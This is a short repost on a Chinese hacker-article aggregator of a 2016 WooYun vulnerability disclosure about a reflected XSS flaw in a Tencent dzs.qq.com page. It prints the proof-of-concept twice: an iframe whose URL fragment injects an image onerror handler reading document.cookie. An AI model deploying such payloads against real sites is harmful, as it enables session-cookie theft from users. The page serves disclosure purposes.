记录黑客技术中优秀的内容,传播黑客文化,分享黑客技术精华

腾讯又一XSS被广泛用于黑产

2016-06-21 03:55

poc

code 区域
<iframe src="http://dzs.qq.com/act/a20141119fullpage/index.htm#'><img src=x.jpg onerror=alert(document.cookie)>" ></iframe>





QQ图片20160504225251.png

漏洞证明:

poc

code 区域
<iframe src="http://dzs.qq.com/act/a20141119fullpage/index.htm#'><img src=x.jpg onerror=alert(document.cookie)>" ></iframe>





QQ图片20160504225251.png



修复方案:

:)无


知识来源: www.wooyun.org/bugs/wooyun-2016-0205124

阅读:154504 | 评论:0 | 标签:xss

想收藏或者和大家分享这篇好文章→复制链接地址

“腾讯又一XSS被广泛用于黑产”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

黑帝公告 📢

永久免费持续更新精选优质黑客技术文章Hackdig,帮你成为掌握黑客技术的英雄

↓赞助商 🙇🧎

标签云 ☁